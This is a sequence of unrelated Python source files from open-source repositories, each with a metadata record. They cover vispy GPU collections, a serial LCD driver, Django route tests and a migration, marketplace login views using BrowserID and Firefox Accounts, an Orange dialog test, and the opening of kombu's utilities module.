        # Convert types to lists (in case they were already dtypes) such
        # that we can append new fields.
        # NOTE(review): round-tripping a dtype through eval(str(...)) is
        # fragile — it relies on numpy's repr being eval-able.
        vtype = eval(str(np.dtype(vtype)))
        # We add a uniform index to access uniform data
        vtype.append(('collection_index', np.float32))
        vtype = np.dtype(vtype)
        # Check utype is made of float32 only
        utype = eval(str(np.dtype(utype)))
        r_utype = dtype_reduce(utype)
        if type(r_utype[0]) is not str or r_utype[2] != 'float32':
            raise RuntimeError("utype cannot be reduced to float32 only")
        # Make utype divisible by 4
        # count = ((r_utype[1]-1)//4+1)*4
        # Make utype a power of two
        count = next_power_of_2(r_utype[1])
        if (count - r_utype[1]) > 0:
            utype.append(('__unused__', np.float32, count - r_utype[1]))
        self._uniforms_list = ArrayList(dtype=utype)
        self._uniforms_float_count = count
        # Reserve some space in texture such that we have
        # at least one full line.
        # NOTE(review): under Python 3 this is true division and yields a
        # float; presumably ArrayList.reserve coerces — confirm.
        shape = self._compute_texture_shape(1)
        self._uniforms_list.reserve(shape[1] / (count / 4))
    # Last since utype may add a new field in vtype (collecion_index)
    self._vertices_list = ArrayList(dtype=vtype)
    # Record all types
    self._vtype = np.dtype(vtype)
    self._itype = np.dtype(itype) if itype is not None else None
    self._utype = np.dtype(utype) if utype is not None else None
def __len__(self):
    """ x.__len__() <==> len(x) """
    # Number of items (not vertices) currently stored.
    return len(self._vertices_list)

@property
def vtype(self):
    """ Vertices dtype """
    return self._vtype

@property
def itype(self):
    """ Indices dtype (None when the collection is unindexed) """
    return self._itype

@property
def utype(self):
    """ Uniforms dtype (None when the collection has no uniforms) """
    return self._utype
def append(self, vertices, uniforms=None, indices=None, itemsize=None):
    """Append one or more items to the collection.

    Parameters
    ----------
    vertices : numpy array
        An array whose dtype is compatible with self.vdtype

    uniforms: numpy array
        An array whose dtype is compatible with self.utype

    indices : numpy array
        An array whose dtype is compatible with self.idtype
        All index values must be between 0 and len(vertices)

    itemsize: int, tuple or 1-D array
        If `itemsize is an integer, N, the array will be divided
        into elements of size N. If such partition is not possible,
        an error is raised.

        If `itemsize` is 1-D array, the array will be divided into
        elements whose succesive sizes will be picked from itemsize.
        If the sum of itemsize values is different from array size,
        an error is raised.
    """
    # Vertices
    # -----------------------------
    vertices = np.array(vertices).astype(self.vtype).ravel()
    vsize = self._vertices_list.size

    # No itemsize given: the whole array is one single item.
    if itemsize is None:
        index = 0
        count = 1
    # Uniform itemsize (int): split into equally-sized items.
    elif isinstance(itemsize, int):
        # Floor division: the original "/" yields a float under Python 3,
        # which breaks np.repeat/np.arange/np.tile below.
        count = len(vertices) // itemsize
        index = np.repeat(np.arange(count), itemsize)
    # Individual itemsize (array): per-item sizes.
    # NOTE(review): the docstring mentions tuple itemsize but only
    # int/list/ndarray are accepted here.
    elif isinstance(itemsize, (np.ndarray, list)):
        count = len(itemsize)
        index = np.repeat(np.arange(count), itemsize)
    else:
        raise ValueError("Itemsize not understood")

    # Each vertex records the rank of the item it belongs to, so shaders
    # can look up the matching uniforms row in the texture.
    if self.utype:
        vertices["collection_index"] = index + len(self)
    self._vertices_list.append(vertices, itemsize)

    # Indices
    # -----------------------------
    if self.itype is not None:
        # No indices given (-> automatic generation)
        if indices is None:
            indices = vsize + np.arange(len(vertices))
            self._indices_list.append(indices, itemsize)
        # Indices given
        # FIXME: variables indices (list of list or ArrayList)
        else:
            if itemsize is None:
                I = np.array(indices) + vsize
            elif isinstance(itemsize, int):
                # Replicate the index pattern for each of the |count| items,
                # offsetting each copy by its item's first vertex.
                I = vsize + (np.tile(indices, count) +
                             itemsize * np.repeat(np.arange(count), len(indices)))  # noqa
            else:
                raise ValueError("Indices not compatible with items")
            self._indices_list.append(I, len(indices))

    # Uniforms
    # -----------------------------
    if self.utype:
        if uniforms is None:
            uniforms = np.zeros(count, dtype=self.utype)
        else:
            uniforms = np.array(uniforms).astype(self.utype).ravel()
        self._uniforms_list.append(uniforms, itemsize=1)

    # GPU buffers/texture are rebuilt lazily on next access.
    self._need_update = True
def __delitem__(self, index):
    """Delete one item (int), a range of items (slice) or all (Ellipsis)."""
    # Deleting one item
    if isinstance(index, int):
        if index < 0:
            index += len(self)
        if index < 0 or index > len(self):
            raise IndexError("Collection deletion index out of range")
        istart, istop = index, index + 1
    # Deleting several items
    elif isinstance(index, slice):
        istart, istop, _ = index.indices(len(self))
        if istart > istop:
            istart, istop = istop, istart
        if istart == istop:
            return
    # Deleting everything
    elif index is Ellipsis:
        istart, istop = 0, len(self)
    # Error
    else:
        raise TypeError("Collection deletion indices must be integers")
    # Number of vertices removed; remaining indices must shift by this much.
    vsize = len(self._vertices_list[index])
    if self.itype is not None:
        del self._indices_list[index]
        # Later indices referred to vertices that moved down by vsize.
        self._indices_list[index:] -= vsize
    if self.utype:
        # Later vertices now belong to items whose rank dropped.
        self._vertices_list[index:]["collection_index"] -= istop - istart
    del self._vertices_list[index]
    if self.utype is not None:
        del self._uniforms_list[index]
    # Buffers/texture are rebuilt lazily on next access.
    self._need_update = True
def __getitem__(self, key):
    """Return a whole named field (str key) or a single item (int key).

    Buffers and the uniform texture are used instead of the underlying
    lists because only they are aware of external modifications.
    """
    if self._need_update:
        self._update()
    vertices_buf = self._vertices_buffer
    indices_buf = None
    uniforms_view = None
    if self._indices_list is not None:
        indices_buf = self._indices_buffer
    if self._uniforms_list is not None:
        uniforms_view = self._uniforms_texture.data.ravel().view(self.utype)
    if isinstance(key, str):
        # Field access: search vertices first, then uniforms.
        if key in vertices_buf.dtype.names:
            return vertices_buf[key]
        if uniforms_view is not None and key in uniforms_view.dtype.names:
            # The texture can be bigger than the list: clip to live length.
            return uniforms_view[key][:len(self._uniforms_list)]
        raise IndexError("Unknown field name ('%s')" % key)
    if isinstance(key, int):
        vstart, vend = self._vertices_list._items[key]
        item_vertices = vertices_buf[vstart:vend]
        item_indices = None
        item_uniforms = None
        if indices_buf is not None:
            istart, iend = self._indices_list._items[key]
            item_indices = indices_buf[istart:iend]
        if uniforms_view is not None:
            ustart, uend = self._uniforms_list._items[key]
            item_uniforms = uniforms_view[ustart:uend]
        return Item(self, key, item_vertices, item_indices, item_uniforms)
    raise IndexError("Cannot get more than one item at once")
def __setitem__(self, key, data):
    """ x.__setitem__(i, y) <==> x[i]=y

    Only whole-field assignment (str key) is supported; per-item
    assignment is not implemented yet.
    """
    if self._need_update:
        self._update()
    vertices_buf = self._vertices_buffer
    uniforms_view = None
    # Buffers/texture (not the lists) are used because only they see
    # external modifications.
    if self._indices_list is not None:
        indices_buf = self._indices_buffer  # noqa
    if self._uniforms_list is not None:
        uniforms_view = self._uniforms_texture.data.ravel().view(self.utype)
    if isinstance(key, str):
        if key in self.vtype.names:
            vertices_buf[key] = data
        elif self.utype and key in self.utype.names:
            # The texture can be bigger than the list: write only the
            # live region.
            uniforms_view[key][:len(self._uniforms_list)] = data
        else:
            raise IndexError("Unknown field name ('%s')" % key)
    else:
        raise IndexError("Cannot set more than one item")
def _compute_texture_shape(self, size=1):
    """Compute the (rows, cols, float-count) shape of the uniform texture.

    ``size`` is the number of items whose uniforms must fit.  The result
    is stored in ``self._ushape`` and returned.

    NOTE(review): ``count / 4`` appears to rely on Python 2 integer
    division; under Python 3 it would yield floats in the shape —
    confirm intended interpreter.
    """
    # We should use this line but we may not have a GL context yet
    # linesize = gl.glGetInteger(gl.GL_MAX_TEXTURE_SIZE)
    linesize = 1024
    # Floats needed per item; 4 floats fit in one RGBA texel.
    count = self._uniforms_float_count
    cols = linesize // float(count / 4)
    rows = max(1, int(math.ceil(size / float(cols))))
    shape = rows, cols * (count / 4), count
    self._ushape = shape
    return shape
def _update(self):
    """ Update vertex buffers & texture

    Rebuilds the GPU-side vertex buffer, index buffer and uniform
    texture from the CPU-side lists, then re-binds them to every
    attached program.
    """
    # Old buffers are explicitly deleted before being replaced.
    if self._vertices_buffer is not None:
        self._vertices_buffer.delete()
    self._vertices_buffer = VertexBuffer(self._vertices_list.data)
    if self.itype is not None:
        if self._indices_buffer is not None:
            self._indices_buffer.delete()
        self._indices_buffer = IndexBuffer(self._indices_list.data)
    if self.utype is not None:
        if self._uniforms_texture is not None:
            self._uniforms_texture.delete()
        # We take the whole array (_data), not the data one
        texture = self._uniforms_list._data.view(np.float32)
        # NOTE(review): true division would make ``size`` a float on
        # Python 3 — this appears to assume Python 2 semantics; confirm.
        size = len(texture) / self._uniforms_float_count
        shape = self._compute_texture_shape(size)
        # shape[2] = float count is only used in vertex shader code
        texture = texture.reshape(shape[0], shape[1], 4)
        self._uniforms_texture = Texture2D(texture)
        self._uniforms_texture.data = texture
        self._uniforms_texture.interpolation = 'nearest'
    if len(self._programs):
        for program in self._programs:
            program.bind(self._vertices_buffer)
            if self._uniforms_list is not None:
                program["uniforms"] = self._uniforms_texture
                program["uniforms_shape"] = self._ushape
|
{
"content_hash": "b95b21aba4eb917f6d6ae7a845811e2f",
"timestamp": "",
"source": "github",
"line_count": 490,
"max_line_length": 94,
"avg_line_length": 33.487755102040815,
"alnum_prop": 0.5448839051739899,
"repo_name": "ghisvail/vispy",
"id": "8f7381d8a6f23248fb4594516e0b55e7d3138591",
"size": "16708",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vispy/visuals/collections/base_collection.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "143081"
},
{
"name": "GLSL",
"bytes": "195460"
},
{
"name": "JavaScript",
"bytes": "5007"
},
{
"name": "Makefile",
"bytes": "1638"
},
{
"name": "PowerShell",
"bytes": "1359"
},
{
"name": "Python",
"bytes": "2551236"
}
],
"symlink_target": ""
}
|
import serial
import time
# Serial connection to the LCD through a CP2102 USB-to-UART bridge,
# 9600 baud, 8 data bits, no parity, 1 stop bit, 5 s read timeout.
lcd = serial.Serial("/dev/serial/by-id/usb-Silicon_Labs_CP2102_USB_to_UART_Bridge_Controller_0001-if00-port0", 9600,
                    serial.EIGHTBITS,
                    serial.PARITY_NONE,
                    serial.STOPBITS_ONE,
                    timeout=5,
                    rtscts = False)
#time.sleep(0.1)
# Delay (seconds) after sending a command so the display can keep up.
wait = 0.04
def BacklightOff():
    """Switch the LCD backlight off."""
    # 0xFE 0x46 is the backlight-off command; the pair is written twice.
    for byte in ("\xFE", "\x46") * 2:
        lcd.write(byte)
def BacklightOn():
    """Switch the LCD backlight on."""
    # 0xFE 0x42 0x00 is the backlight-on command; the triple is written twice.
    for byte in ("\xFE", "\x42", "\x00") * 2:
        lcd.write(byte)
    time.sleep(wait)
#This function writes the data to the line passed in as a parameter, e.g. Writeline("This is a test","1")
#will write "This is a test" to line 1. If the data is "$blank" it will print a blank line on the display.
#The string has to be 16 characters; if it is not, the function will pad spaces after it. If it is too long
#it will trim it. If an invalid line is specified it assumes line 1.
def Writeline(data, line):
    """Write *data* (up to 16 chars) to LCD *line* ("1" or "2").

    "$blank" clears the line; short strings are space-padded, long ones
    trimmed.  An invalid line selector falls back to line 1.
    """
    if data == "$blank":
        data = " "
    # FIX: this was an elif chain hanging off the data check, so the
    # line selector was never converted when data == "$blank", and the
    # always-true ``line != "1" or "2"`` fallback assigned "1" instead
    # of the "\x01" command byte.
    if line == "1":
        line = "\x01"
    elif line == "2":
        line = "\x02"
    else:
        line = "\x01"  # invalid line: assume line 1
    data = data.ljust(16)[:16]
    command = ["\xFE", "\x47", "\x01", line, data]
    for item in command:
        lcd.write(item)
    time.sleep(wait)
|
{
"content_hash": "682b390e3163a418c76ae209170c5d5a",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 116,
"avg_line_length": 30.73913043478261,
"alnum_prop": 0.5827439886845828,
"repo_name": "oskarer/pi-boombox",
"id": "b94a3655518645f4d0608f98891b029e74c1be62",
"size": "1437",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "driver.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1507"
}
],
"symlink_target": ""
}
|
from django.test import TestCase
from django.urls import reverse
from django.contrib.auth.models import User
from netdevice.tests import create_router
from static.models import ipv6_static, ipv4_static
def create_v4_static(test_router, network):
    """Create and return an IPv4 /16 static route on *test_router*."""
    return ipv4_static.objects.create(
        router=test_router,
        network=network,
        cidr=16,
        next_hop='172.16.0.1',
    )
def create_v6_static(test_router, network):
    """Create and return an IPv6 /48 static route on *test_router*."""
    return ipv6_static.objects.create(
        router=test_router,
        network=network,
        cidr=48,
        next_hop='2001:db8::1',
    )
class StaticViewTest(TestCase):
    """View and config-template tests for IPv4/IPv6 static routes."""

    def setUp(self):
        # All tested views require an authenticated session.
        self.client.force_login(
            User.objects.get_or_create(username='testuser')[0])

    def test_config_view_with_a_single_ios_static_route(self):
        """
        Create an IOS router, interface, and IP addresses, then check the
        configuration template output.
        """
        test_router = create_router('ios')
        # Return values unused: the routes only need to exist in the DB.
        create_v4_static(test_router, '10.0.0.0')
        create_v6_static(test_router, '2001:db8:100::')
        response = self.client.get(reverse('netdevice:router_config', kwargs={'router_id': test_router.id}))
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, 'ip route 10.0.0.0 255.255.0.0 172.16.0.1')
        self.assertContains(response, 'ipv6 route 2001:db8:100::/48 2001:db8::1')

    def test_config_view_with_junos_static_route(self):
        """
        Create a JunOS router, interface, and IP addresses, then check the
        configuration template output.
        """
        test_router = create_router('junos')
        create_v4_static(test_router, '10.0.0.0')
        create_v6_static(test_router, '2001:db8:100::')
        response = self.client.get(reverse('netdevice:router_config', kwargs={'router_id': test_router.id}))
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, 'route 10.0.0.0/16 next-hop 172.16.0.1')
        self.assertContains(response, 'route 2001:db8:100::/48 next-hop 2001:db8::1')

    def test_config_view_with_multiple_ios_static_route(self):
        """
        Create 99 static routes (IDs 1-99), and ensure they are templated
        properly.
        """
        test_router = create_router('ios')
        route_count = 100
        for i in range(1, route_count):
            create_v4_static(test_router, '10.' + str(i) + '.0.0')
            create_v6_static(test_router, '2001:db8:' + str(i) + '::')
        response = self.client.get(reverse('netdevice:router_config', kwargs={'router_id': test_router.id}))
        self.assertEqual(response.status_code, 200)
        for i in range(1, route_count):
            self.assertContains(response, 'ip route 10.' + str(i) + '.0.0 255.255.0.0 172.16.0.1')
            self.assertContains(response, 'ipv6 route 2001:db8:' + str(i) + '::/48 2001:db8::1')

    def test_config_view_with_multiple_junos_static_route(self):
        """
        Create 99 static routes (IDs 1-99), and ensure they are templated
        properly.
        """
        test_router = create_router('junos')
        route_count = 100
        for i in range(1, route_count):
            create_v4_static(test_router, '10.' + str(i) + '.0.0')
            create_v6_static(test_router, '2001:db8:' + str(i) + '::')
        response = self.client.get(reverse('netdevice:router_config', kwargs={'router_id': test_router.id}))
        self.assertEqual(response.status_code, 200)
        for i in range(1, route_count):
            self.assertContains(response, 'route 10.' + str(i) + '.0.0/16 next-hop 172.16.0.1')
            self.assertContains(response, 'route 2001:db8:' + str(i) + '::/48 next-hop 2001:db8::1')

    def test_create_ipv6_static_route_form_view(self):
        """
        Create a router, then test that the create a static route page view is displayed correctly.
        """
        test_router = create_router('junos')
        response = self.client.get(reverse('static:ipv6_static_create', kwargs={'router_id': test_router.id}))
        self.assertEqual(response.status_code, 200)

    def test_create_ipv4_static_route_form_view(self):
        """
        Create a router, then test that the create a static route page view is displayed correctly.
        """
        test_router = create_router('junos')
        response = self.client.get(reverse('static:ipv4_static_create', kwargs={'router_id': test_router.id}))
        self.assertEqual(response.status_code, 200)

    def test_edit_ipv6_static_route_form_view(self):
        """
        Create a router, and static route, then check that the edit form view is displayed correctly.
        """
        test_router = create_router('junos')
        static_route = create_v6_static(test_router, '2001:db8:1::')
        response = self.client.get(reverse('static:ipv6_static_edit', kwargs={'ipv6_static_id': static_route.id}))
        self.assertEqual(response.status_code, 200)

    def test_edit_ipv4_static_route_form_view(self):
        """
        Create a router, and static route, then check that the edit form view is displayed correctly.
        """
        test_router = create_router('junos')
        static_route = create_v4_static(test_router, '192.0.2.0')
        response = self.client.get(reverse('static:ipv4_static_edit', kwargs={'ipv4_static_id': static_route.id}))
        self.assertEqual(response.status_code, 200)
|
{
"content_hash": "ab8557aa22d7f96252102cb492ae7d64",
"timestamp": "",
"source": "github",
"line_count": 136,
"max_line_length": 124,
"avg_line_length": 43.80882352941177,
"alnum_prop": 0.5845921450151057,
"repo_name": "lkmhaqer/gtools-python",
"id": "e2d8501e296b6e9647fbef07307cd592d333ad9e",
"size": "5983",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "static/tests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2543"
},
{
"name": "HTML",
"bytes": "24530"
},
{
"name": "Python",
"bytes": "123398"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Auto-generated migration: relaxes vote/comment counter columns on
    # the ideascale `comment` and `idea` models to allow NULL.
    # NOTE(review): comment.positive_votes is the only counter left
    # non-nullable here — confirm that is intentional.
    dependencies = [
        ('ideascale', '0007_auto_20150429_1503'),
    ]
    operations = [
        migrations.AlterField(
            model_name='comment',
            name='comments',
            field=models.PositiveIntegerField(null=True),
        ),
        migrations.AlterField(
            model_name='comment',
            name='negative_votes',
            field=models.PositiveIntegerField(null=True),
        ),
        migrations.AlterField(
            model_name='comment',
            name='positive_votes',
            field=models.PositiveIntegerField(),
        ),
        migrations.AlterField(
            model_name='idea',
            name='comments',
            field=models.PositiveIntegerField(null=True),
        ),
        migrations.AlterField(
            model_name='idea',
            name='negative_votes',
            field=models.PositiveIntegerField(null=True),
        ),
        migrations.AlterField(
            model_name='idea',
            name='positive_votes',
            field=models.PositiveIntegerField(null=True),
        ),
    ]
|
{
"content_hash": "c6066bce6c18cd933aec37e558ba1290",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 57,
"avg_line_length": 28.162790697674417,
"alnum_prop": 0.5565648224607762,
"repo_name": "joausaga/social-ideation",
"id": "86d768d6545c98710c4e534dd5543b0148e584c8",
"size": "1235",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "ideascale/migrations/0008_auto_20150429_2247.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1411"
},
{
"name": "HTML",
"bytes": "26382"
},
{
"name": "JavaScript",
"bytes": "986"
},
{
"name": "Python",
"bytes": "389664"
},
{
"name": "Shell",
"bytes": "1284"
}
],
"symlink_target": ""
}
|
import functools
import json
import urlparse
from django import http
from django.conf import settings
from django.contrib import auth
from django.db import transaction
from django.shortcuts import get_object_or_404
from django.template.response import TemplateResponse
from django.utils.http import is_safe_url
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
import commonware.log
import waffle
from django_browserid import BrowserIDBackend, get_audience
from django_statsd.clients import statsd
from requests_oauthlib import OAuth2Session
from tower import ugettext as _
import amo
from amo.utils import escape_all, log_cef
from lib.metrics import record_action
from mkt.site.decorators import json_view, login_required
from .models import UserProfile
from .signals import logged_out
from .utils import autocreate_username
log = commonware.log.getLogger('z.users')
def user_view(f):
    """Decorator resolving the ``user_id`` URL argument to a UserProfile.

    Accepts a numeric id, a username, or the literal ``me`` for the
    currently authenticated user, and passes the resolved profile to
    the wrapped view.
    """
    @functools.wraps(f)
    def wrapper(request, user_id, *args, **kw):
        lookup_field = 'id' if user_id.isdigit() else 'username'
        # `me` is an alias for the current user's own profile.
        if (user_id == 'me' and request.user.is_authenticated() and
                request.user.username):
            user_id = request.user.username
        user = get_object_or_404(UserProfile, **{lookup_field: user_id})
        return f(request, user, *args, **kw)
    return wrapper
@login_required(redirect=False)
@json_view
def ajax(request):
    """Query for a user matching a given email."""
    if 'q' not in request.GET:
        raise http.Http404()
    email = request.GET.get('q', '').strip()
    try:
        dev_only = int(request.GET.get('dev', '1'))
    except ValueError:
        dev_only = 1
    data = {'status': 0, 'message': ''}
    if not email:
        data.update(message=_('An email address is required.'))
        return data
    users = UserProfile.objects.filter(email=email)
    if dev_only:
        # Developers must have accepted the dev agreement.
        users = users.exclude(read_dev_agreement=None)
    if users:
        data.update(status=1, id=users[0].id, name=users[0].name)
    elif dev_only:
        data['message'] = _('A user with that email address does not exist, '
                            'or the user has not yet accepted the developer '
                            'agreement.')
    else:
        data['message'] = _('A user with that email address does not exist.')
    return escape_all(data)
def _clean_next_url(request):
    """Sanitize the ``to`` redirect target in request.GET.

    Off-host (unsafe) URLs are replaced with LOGIN_REDIRECT_URL.
    """
    params = request.GET.copy()
    target = params.get('to', settings.LOGIN_REDIRECT_URL)
    if not is_safe_url(target, host=request.get_host()):
        log.info(u'Unsafe redirect to %s' % target)
        target = settings.LOGIN_REDIRECT_URL
    params['to'] = target
    request.GET = params
    return request
def get_fxa_session(**kwargs):
    """Return an OAuth2Session for Firefox Accounts with profile scope."""
    return OAuth2Session(settings.FXA_CLIENT_ID, scope=u'profile', **kwargs)
def fxa_oauth_api(name):
    """Return the absolute URL of the ``v1/<name>`` FxA OAuth endpoint."""
    return urlparse.urljoin(settings.FXA_OAUTH_URL, 'v1/' + name)
def _fxa_authorize(fxa, client_secret, request, auth_response, userid):
    """Complete the FxA OAuth flow and log the matching user in.

    Exchanges *auth_response* for an access token, verifies it, then
    finds (by pk, FxA uid, then email) or creates the matching
    UserProfile and logs it in.  Returns the profile when FxA reports a
    user; otherwise falls through and returns None implicitly.
    """
    token = fxa.fetch_token(
        fxa_oauth_api('token'),
        authorization_response=auth_response,
        client_secret=client_secret)
    res = fxa.post(fxa_oauth_api('verify'),
                   data=json.dumps({'token': token['access_token']}),
                   headers={'Content-Type': 'application/json'})
    data = res.json()
    if 'user' in data:
        email = data['email']
        fxa_uid = data['user']

        def find_user(**kwargs):
            # Return the profile matching kwargs, or None when absent.
            try:
                return UserProfile.objects.get(**kwargs)
            except UserProfile.DoesNotExist:
                return None
        # Match an existing profile by pk first, then FxA uid, then email.
        profile = (find_user(pk=userid) or find_user(username=fxa_uid)
                   or find_user(email=email))
        if profile:
            # Migrate the existing account onto the FxA identifiers.
            profile.update(username=fxa_uid, email=email)
        else:
            profile = UserProfile.objects.create(
                username=fxa_uid,
                email=email,
                source=amo.LOGIN_SOURCE_FXA,
                display_name=email.partition('@')[0],
                is_verified=True)
            log_cef('New Account', 5, request, username=fxa_uid,
                    signature='AUTHNOTICE',
                    msg='User created a new account (from FxA)')
            record_action('new-user', request)
        if profile.source != amo.LOGIN_SOURCE_FXA:
            profile.update(source=amo.LOGIN_SOURCE_FXA)
        auth.login(request, profile)
        profile.log_login_attempt(True)
        auth.signals.user_logged_in.send(sender=profile.__class__,
                                         request=request, user=profile)
        return profile
def browserid_authenticate(request, assertion, is_mobile=False,
                           browserid_audience=get_audience):
    """
    Verify a BrowserID login attempt. If the BrowserID assertion is
    good, but no account exists, create one.

    Returns a ``(profile, error_message)`` pair; exactly one of the two
    is None.
    """
    extra_params = {}
    if waffle.switch_is_active('firefox_accounts'):
        url = settings.NATIVE_FXA_VERIFICATION_URL
    else:
        url = settings.BROWSERID_VERIFICATION_URL
    # We must always force the Firefox OS identity provider. This is
    # because we are sometimes allowing unverified assertions and you
    # can't mix that feature with bridged IdPs. See bug 910938.
    if settings.UNVERIFIED_ISSUER:
        extra_params['experimental_forceIssuer'] = settings.UNVERIFIED_ISSUER
    if is_mobile:
        # When persona is running in a mobile OS then we can allow
        # unverified assertions.
        url = settings.NATIVE_BROWSERID_VERIFICATION_URL
        extra_params['experimental_allowUnverified'] = 'true'
    log.debug('Verifying Persona at %s, audience: %s, '
              'extra_params: %s' % (url, browserid_audience, extra_params))
    v = BrowserIDBackend().get_verifier()
    v.verification_service_url = url
    result = v.verify(assertion, browserid_audience, url=url, **extra_params)
    if not result:
        return None, _('Persona authentication failure.')
    if 'unverified-email' in result._response:
        email = result._response['unverified-email']
        verified = False
    # FIX: was ``result._response.get['issuer']`` — subscripting the
    # bound ``get`` method raises TypeError; it must be called.
    elif (result._response.get('issuer') == settings.NATIVE_FXA_ISSUER and
          'fxa-verifiedEmail' in result._response.get('idpClaims', {})):
        email = result._response['idpClaims']['fxa-verifiedEmail']
        verified = True
    else:
        email = result.email
        verified = True
    try:
        profile = UserProfile.objects.filter(email=email)[0]
    except IndexError:
        profile = None
    if profile:
        if profile.is_verified and not verified:
            # An attempt to log in to a verified address with an unverified
            # assertion is a very bad thing. Don't let that happen.
            log.debug('Verified user %s attempted to log in with an '
                      'unverified assertion!' % profile)
            return None, _('Please use the verified email for this account.')
        else:
            profile.is_verified = verified
            profile.save()
        return profile, None
    username = autocreate_username(email.partition('@')[0])
    source = amo.LOGIN_SOURCE_MMO_BROWSERID
    profile = UserProfile.objects.create(username=username, email=email,
                                         source=source, display_name=username,
                                         is_verified=verified)
    log_cef('New Account', 5, request, username=username,
            signature='AUTHNOTICE',
            msg='User created a new account (from Persona)')
    record_action('new-user', request)
    return profile, None
@csrf_exempt
@require_POST
@transaction.commit_on_success
def browserid_login(request, browserid_audience=None):
    """Log a user in from a POSTed BrowserID/Persona assertion."""
    if request.user.is_authenticated():
        # If username is different, maybe sign in as new user?
        return http.HttpResponse(status=200)
    try:
        is_mobile = bool(int(request.POST.get('is_mobile', 0)))
    except ValueError:
        is_mobile = False
    with statsd.timer('auth.browserid.verify'):
        profile, msg = browserid_authenticate(
            request, request.POST.get('assertion'),
            is_mobile=is_mobile,
            browserid_audience=browserid_audience or get_audience(request))
    if profile is None:
        return http.HttpResponse(msg, status=401)
    auth.login(request, profile)
    profile.log_login_attempt(True)
    return http.HttpResponse(status=200)
# Used by mkt.developers.views:login.
def _login(request, template=None, data=None, dont_redirect=False):
    """Render the login template, or redirect when already logged in."""
    data = data or {}
    data['webapp'] = True
    if 'to' in request.GET:
        # Sanitize and remember the post-login destination.
        request = _clean_next_url(request)
        data['to'] = request.GET.get('to')
    if not request.user.is_authenticated():
        return TemplateResponse(request, template, data)
    return http.HttpResponseRedirect(
        request.GET.get('to', settings.LOGIN_REDIRECT_URL))
def logout(request):
    """Log the current user out and redirect.

    The (sanitized) ``to`` query parameter wins, falling back to
    LOGOUT_REDIRECT_URL; the ``logged_out`` signal is fired with the
    outgoing response.
    """
    user = request.user
    if not user.is_anonymous():
        log.debug(u"User (%s) logged out" % user)
    auth.logout(request)
    if 'to' in request.GET:
        request = _clean_next_url(request)
    # Renamed from `next`, which shadowed the builtin.
    next_url = request.GET.get('to')
    if not next_url:
        next_url = settings.LOGOUT_REDIRECT_URL
    response = http.HttpResponseRedirect(next_url)
    # Fire logged out signal.
    logged_out.send(None, request=request, response=response)
    return response
|
{
"content_hash": "272fd5582ec1d0935f4a5f935c9aebde",
"timestamp": "",
"source": "github",
"line_count": 292,
"max_line_length": 81,
"avg_line_length": 32.98287671232877,
"alnum_prop": 0.628179835946423,
"repo_name": "ngokevin/zamboni",
"id": "7b495f1f0346727eb2b729ab238104357654b16f",
"size": "9631",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mkt/users/views.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "356777"
},
{
"name": "JavaScript",
"bytes": "536388"
},
{
"name": "Python",
"bytes": "3883015"
},
{
"name": "Shell",
"bytes": "13597"
}
],
"symlink_target": ""
}
|
from ...scheme import Scheme
from ..schemeinfo import SchemeInfoDialog
from ...gui import test
class TestSchemeInfo(test.QAppTestCase):
    def test_scheme_info(self):
        """Open the scheme-info dialog and, when accepted, verify that
        the editor widgets reflect the scheme's title and description."""
        scheme = Scheme(title="A Scheme", description="A String\n")
        dialog = SchemeInfoDialog()
        dialog.setScheme(scheme)
        if dialog.exec_() == dialog.Accepted:
            name_text = str(dialog.editor.name_edit.text()).strip()
            desc_text = str(dialog.editor.desc_edit.toPlainText()).strip()
            self.assertEqual(scheme.title.strip(), name_text)
            self.assertEqual(scheme.description, desc_text)
|
{
"content_hash": "92f98d8804d0721bcedc377a0bf1762d",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 73,
"avg_line_length": 35.78947368421053,
"alnum_prop": 0.5720588235294117,
"repo_name": "cheral/orange3",
"id": "8ae117fe2469d9b2443414456b18d7246c9688f9",
"size": "680",
"binary": false,
"copies": "18",
"ref": "refs/heads/master",
"path": "Orange/canvas/application/tests/test_schemeinfo.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "20412"
},
{
"name": "C++",
"bytes": "1992"
},
{
"name": "GLSL",
"bytes": "75"
},
{
"name": "HTML",
"bytes": "3503"
},
{
"name": "JavaScript",
"bytes": "12023"
},
{
"name": "Jupyter Notebook",
"bytes": "6662"
},
{
"name": "NSIS",
"bytes": "20217"
},
{
"name": "Python",
"bytes": "4139574"
},
{
"name": "Shell",
"bytes": "47441"
}
],
"symlink_target": ""
}
|
"""
kombu.utils
===========
Internal utilities.
"""
from __future__ import absolute_import, print_function
import importlib
import numbers
import random
import sys
from contextlib import contextmanager
from itertools import count, repeat
from functools import wraps
from time import sleep
from uuid import UUID, uuid4 as _uuid4, _uuid_generate_random
from kombu.five import items, reraise, string_t
from .encoding import default_encode, safe_repr as _safe_repr
try:
import ctypes
except:
ctypes = None # noqa
try:
from io import UnsupportedOperation
FILENO_ERRORS = (AttributeError, ValueError, UnsupportedOperation)
except ImportError: # pragma: no cover
# Py2
FILENO_ERRORS = (AttributeError, ValueError) # noqa
__all__ = ['EqualityDict', 'say', 'uuid', 'kwdict', 'maybe_list',
'fxrange', 'fxrangemax', 'retry_over_time',
'emergency_dump_state', 'cached_property',
'reprkwargs', 'reprcall', 'nested', 'fileno', 'maybe_fileno']
def symbol_by_name(name, aliases={}, imp=None, package=None,
                   sep='.', default=None, **kwargs):
    """Get symbol by qualified name.

